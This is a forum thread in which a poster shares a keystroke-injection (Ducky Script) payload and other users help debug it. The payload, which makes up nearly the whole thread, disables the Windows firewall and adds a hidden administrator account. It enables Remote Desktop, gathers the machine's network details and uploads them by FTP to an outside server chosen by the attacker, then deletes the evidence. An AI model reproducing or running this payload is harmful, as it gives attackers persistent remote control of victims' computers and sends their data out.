[Payload] Remotely Possible

[Bucky67GTO]

OK all...Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. I am thinking something like netcat in the unix world? As always, Ideas?

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
ALT y
ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING net user /add username password
ENTER
DELAY 400
STRING net localgroup administrators username /add
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
ENTER
DELAY 400
STRING sc config TermService start= auto
ENTER
DELAY 400
STRING net start Termservice
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ipconfig /all > number.txt
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING login name
ENTER
DELAY 400
STRING login password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING PUT number.txt
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
STRING del number.txt
ENTER
DELAY 400
ALT SPACE
STRING c

Edited February 6, 2013 by midnitesnake
Corrected Formatting, and small error

[Bucky67GTO]

alright. News? does it work as intended....issues?

[mrt0mat0]

line 9 - STRING ALT y .... drop the STRING, i think

[Bucky67GTO]

I think you might be right...thanks